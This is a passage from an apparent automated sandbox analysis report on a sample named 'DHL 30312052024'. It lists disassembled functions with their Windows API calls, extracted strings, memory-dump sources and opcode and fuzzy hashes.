                                                                                        • GetDesktopWindow.USER32 ref: 00C8A40D
                                                                                        • GetWindowRect.USER32(00000000), ref: 00C8A414
                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C8A42C
                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C8A444
                                                                                          • Part of subcall function 00C025DB: GetWindowLongW.USER32(?,000000EB), ref: 00C025EC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                        • String ID: 0$@U=u$tooltips_class32
                                                                                        • API String ID: 1297703922-1130792468
                                                                                        • Opcode ID: 4fcbb026232a8d67afbe89ee3f12f543909220274731d863e4f15c1e28b2fbcb
                                                                                        • Instruction ID: fe1afaa718e3ff9fd50ea809fc59d6a898895235b07a331d49361a79be027b09
                                                                                        • Opcode Fuzzy Hash: 4fcbb026232a8d67afbe89ee3f12f543909220274731d863e4f15c1e28b2fbcb
                                                                                        • Instruction Fuzzy Hash: F871CF70141204AFEB25DF28CC49F6B7BE5FB88308F04452EF995872A1D770EA46DB5A
                                                                                        Function 00C8C5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C02612: GetWindowLongW.USER32(?,000000EB), ref: 00C02623
                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 00C8C627
                                                                                          • Part of subcall function 00C8AB37: ClientToScreen.USER32(?,?), ref: 00C8AB60
                                                                                          • Part of subcall function 00C8AB37: GetWindowRect.USER32(?,?), ref: 00C8ABD6
                                                                                          • Part of subcall function 00C8AB37: PtInRect.USER32(?,?,00C8C014), ref: 00C8ABE6
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00C8C690
                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C8C69B
                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00C8C6BE
                                                                                        • _wcscat.LIBCMT ref: 00C8C6EE
                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00C8C705
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00C8C71E
                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00C8C735
                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00C8C757
                                                                                        • DragFinish.SHELL32(?), ref: 00C8C75E
                                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00C8C851
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$@U=u
                                                                                        • API String ID: 169749273-762882726
                                                                                        • Opcode ID: ebd24930c68329e518bc680d65a848cfc5913807992e79160ec6bdaa962aa8c0
                                                                                        • Instruction ID: 757e5d49a765ea7ab26accdccff3e9c972e8881bb1a2f070f4bacf5fd0d491a2
                                                                                        • Opcode Fuzzy Hash: ebd24930c68329e518bc680d65a848cfc5913807992e79160ec6bdaa962aa8c0
                                                                                        • Instruction Fuzzy Hash: 16615C71508304AFC701EF64CC85E9FBBE8EF89714F100A2EF595921A1DB70AA49DB56
                                                                                        Function 00C5ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp
                                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                        • API String ID: 1038674560-1810252412
                                                                                        • Opcode ID: bbd64d3b9c59b028f6d107ae48a90d08967c8c85832a662caa805afc3cee4c77
                                                                                        • Instruction ID: 98477b97d4af99c9643fb089984ab2ff121e8c4bf89dd098c1bd0453e042b919
                                                                                        • Opcode Fuzzy Hash: bbd64d3b9c59b028f6d107ae48a90d08967c8c85832a662caa805afc3cee4c77
                                                                                        • Instruction Fuzzy Hash: 1B319035948209ABDB14FA61DE03EEE7764AF10712F200729BC52710D1EB627F48F656
                                                                                        Function 00C74FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00C75013
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00C7501E
                                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00C75029
                                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00C75034
                                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 00C7503F
                                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 00C7504A
                                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00C75055
                                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00C75060
                                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 00C7506B
                                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00C75076
                                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00C75081
                                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 00C7508C
                                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00C75097
                                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 00C750A2
                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00C750AD
                                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00C750B8
                                                                                        • GetCursorInfo.USER32(?), ref: 00C750C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$Load$Info
                                                                                        • String ID:
                                                                                        • API String ID: 2577412497-0
                                                                                        • Opcode ID: dbc4e1fb46d3cb50b62ede9e0e27e24905af8ae0ef9a04aed7c90c8d80ffad90
                                                                                        • Instruction ID: 3dfab29f26f5001595aacec2d1880db80c5fed4a1bbeaef7f0d22bf32261e83d
                                                                                        • Opcode Fuzzy Hash: dbc4e1fb46d3cb50b62ede9e0e27e24905af8ae0ef9a04aed7c90c8d80ffad90
                                                                                        • Instruction Fuzzy Hash: 393105B1D483196ADF109FB68C8995FBFE8FF04750F50452AA51DE7280DA786501CF91
                                                                                        Function 00C84392 Relevance: 24.8, APIs: 2, Strings: 12, Instructions: 251windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00C84424
                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C8446F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                        • String ID: @U=u$CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                        • API String ID: 3974292440-383632319
                                                                                        • Opcode ID: f23a6cd093575ca4626d398eb0593329779feb50e27174dcdb304478db650554
                                                                                        • Instruction ID: 55240575c643b3cc37ac39c4386704e91ea9eaabfd3f5eea0157a803d12dd062
                                                                                        • Opcode Fuzzy Hash: f23a6cd093575ca4626d398eb0593329779feb50e27174dcdb304478db650554
                                                                                        • Instruction Fuzzy Hash: 6D9189702043129FCB08EF10C451A6EB7A1EF95354F548969F8A65B3E3DB30ED4AEB85
                                                                                        Function 00C8B7FE Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 197windowlibraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00C8B8B4
                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00C86B11,?), ref: 00C8B910
                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C8B949
                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00C8B98C
                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C8B9C3
                                                                                        • FreeLibrary.KERNEL32(?), ref: 00C8B9CF
                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C8B9DF
                                                                                        • DestroyIcon.USER32(?), ref: 00C8B9EE
                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00C8BA0B
                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00C8BA17
                                                                                          • Part of subcall function 00C22EFD: __wcsicmp_l.LIBCMT ref: 00C22F86
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                        • String ID: .dll$.exe$.icl$@U=u
                                                                                        • API String ID: 1212759294-1639919054
                                                                                        • Opcode ID: b5e0d4e7e42c510694d9356ea0d0abdade88fc8f70e1301c74daaff3366ce947
                                                                                        • Instruction ID: 48ac5af0a3ee3d40876b7a5da79f03a48b86c601de2f1016d2084c989e14140e
                                                                                        • Opcode Fuzzy Hash: b5e0d4e7e42c510694d9356ea0d0abdade88fc8f70e1301c74daaff3366ce947
                                                                                        • Instruction Fuzzy Hash: F361F071500219BBEB24EF64DC41FBE7BB8EB08715F104219F921D61C1DB74AE81DBA4
                                                                                        Function 00C6A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C09837: __itow.LIBCMT ref: 00C09862
                                                                                          • Part of subcall function 00C09837: __swprintf.LIBCMT ref: 00C098AC
                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00C6A3CB
                                                                                        • GetDriveTypeW.KERNEL32 ref: 00C6A418
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C6A460
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C6A497
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C6A4C5
                                                                                          • Part of subcall function 00C07BCC: _memmove.LIBCMT ref: 00C07C06
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                        • API String ID: 2698844021-4113822522
                                                                                        • Opcode ID: fc74b5ffc8d1b2f1482a5e8fe616209ea5e965460f4887301d153a889882d542
                                                                                        • Instruction ID: 0ec348839ed85c995b1bc51fb2aecf273fc092202aeb708ae46bd996899ec8b9
                                                                                        • Opcode Fuzzy Hash: fc74b5ffc8d1b2f1482a5e8fe616209ea5e965460f4887301d153a889882d542
                                                                                        • Instruction Fuzzy Hash: 0D514F715083059FC704EF10C89196AB7E8FF94758F10896DF89A672A2DB31EE0ADF52
                                                                                        Function 00C5F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00C3E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00C5F8DF
                                                                                        • LoadStringW.USER32(00000000,?,00C3E029,00000001), ref: 00C5F8E8
                                                                                          • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00CC5310,?,00000FFF,?,?,00C3E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00C5F90A
                                                                                        • LoadStringW.USER32(00000000,?,00C3E029,00000001), ref: 00C5F90D
                                                                                        • __swprintf.LIBCMT ref: 00C5F95D
                                                                                        • __swprintf.LIBCMT ref: 00C5F96E
                                                                                        • _wprintf.LIBCMT ref: 00C5FA17
                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C5FA2E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                        • API String ID: 984253442-2268648507
                                                                                        • Opcode ID: 2bcf7f8fb861322d6d7cb57d6b5c93428f8f6e95738a02ea206ae966c10f9d7a
                                                                                        • Instruction ID: f63ea2c9dae755b246ee9f6d0bc472f9dc4790a28cf1e479e4b3a8e25484f0fd
                                                                                        • Opcode Fuzzy Hash: 2bcf7f8fb861322d6d7cb57d6b5c93428f8f6e95738a02ea206ae966c10f9d7a
                                                                                        • Instruction Fuzzy Hash: 2D412C72C04219ABCF09FBE0DD86EEEB778AF14301F100165B60576092EA356F4AEB65
                                                                                        Function 00C6D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __wsplitpath.LIBCMT ref: 00C6DA10
                                                                                        • _wcscat.LIBCMT ref: 00C6DA28
                                                                                        • _wcscat.LIBCMT ref: 00C6DA3A
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C6DA4F
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C6DA63
                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00C6DA7B
                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00C6DA95
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C6DAA7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                        • String ID: *.*
                                                                                        • API String ID: 34673085-438819550
                                                                                        • Opcode ID: 0cfe87201191c3971b83f54f497eb33a868162be55ffd471999d543e344d638a
                                                                                        • Instruction ID: 7e07664624e361ed3800dfbdfb2801c876b3f363c1c94bf464dab35afaba8850
                                                                                        • Opcode Fuzzy Hash: 0cfe87201191c3971b83f54f497eb33a868162be55ffd471999d543e344d638a
                                                                                        • Instruction Fuzzy Hash: 53816471A083419FCB34DF65C884A6AB7E4EF89710F188D2EF49ACB251DA30DA45DB52
                                                                                        Function 00C8C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C02612: GetWindowLongW.USER32(?,000000EB), ref: 00C02623
                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C8C1FC
                                                                                        • GetFocus.USER32 ref: 00C8C20C
                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 00C8C217
                                                                                        • _memset.LIBCMT ref: 00C8C342
                                                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00C8C36D
                                                                                        • GetMenuItemCount.USER32(?), ref: 00C8C38D
                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00C8C3A0
                                                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00C8C3D4
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00C8C41C
                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C8C454
                                                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00C8C489
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 1296962147-4108050209
                                                                                        • Opcode ID: c88f5d8cd8a60e6a018255bfcd6c554a113cacda3c5d20a47935db01778eb35c
                                                                                        • Instruction ID: dc78092416c217b2d9e1b635d1503b8c48b2db35e8c69cf34c7df0d2e0e1b30e
                                                                                        • Opcode Fuzzy Hash: c88f5d8cd8a60e6a018255bfcd6c554a113cacda3c5d20a47935db01778eb35c
                                                                                        • Instruction Fuzzy Hash: 68819D70608311AFD710EF14C8D4A7BBBE4FB88718F00492EF9A5972A1D770DA45CB66
                                                                                        Function 00C7731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 00C7738F
                                                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00C7739B
                                                                                        • CreateCompatibleDC.GDI32(?), ref: 00C773A7
                                                                                        • SelectObject.GDI32(00000000,?), ref: 00C773B4
                                                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00C77408
                                                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00C77444
                                                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00C77468
                                                                                        • SelectObject.GDI32(00000006,?), ref: 00C77470
                                                                                        • DeleteObject.GDI32(?), ref: 00C77479
                                                                                        • DeleteDC.GDI32(00000006), ref: 00C77480
                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00C7748B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                        • String ID: (
                                                                                        • API String ID: 2598888154-3887548279
                                                                                        • Opcode ID: 1e8468b8a46664cc3fbf3acecb6bcd9c908360f7cee722694686d7a34d479cff
                                                                                        • Instruction ID: 145bcd46b29266c7cc444506a21d81e6005e2ba7c5d5368aeeeb9dd121fb7620
                                                                                        • Opcode Fuzzy Hash: 1e8468b8a46664cc3fbf3acecb6bcd9c908360f7cee722694686d7a34d479cff
                                                                                        • Instruction Fuzzy Hash: 25515875904209EFCB14CFA8CC85FAEBBB9EF48310F14852DF959A7221C731A9419B50
                                                                                        Function 00C64F75 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 72sleepwindowtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • timeGetTime.WINMM ref: 00C64F7A
                                                                                          • Part of subcall function 00C2049F: timeGetTime.WINMM(?,753DB400,00C10E7B), ref: 00C204A3
                                                                                        • Sleep.KERNEL32(0000000A), ref: 00C64FA6
                                                                                        • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00C64FCA
                                                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C64FEC
                                                                                        • SetActiveWindow.USER32 ref: 00C6500B
                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C65019
                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00C65038
                                                                                        • Sleep.KERNEL32(000000FA), ref: 00C65043
                                                                                        • IsWindow.USER32 ref: 00C6504F
                                                                                        • EndDialog.USER32(00000000), ref: 00C65060
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                        • String ID: @U=u$BUTTON
                                                                                        • API String ID: 1194449130-2582809321
                                                                                        • Opcode ID: a5b1a5ef4e7fcce6fe65d7c11d093a45bc890cf7971bc180c53de776c401df15
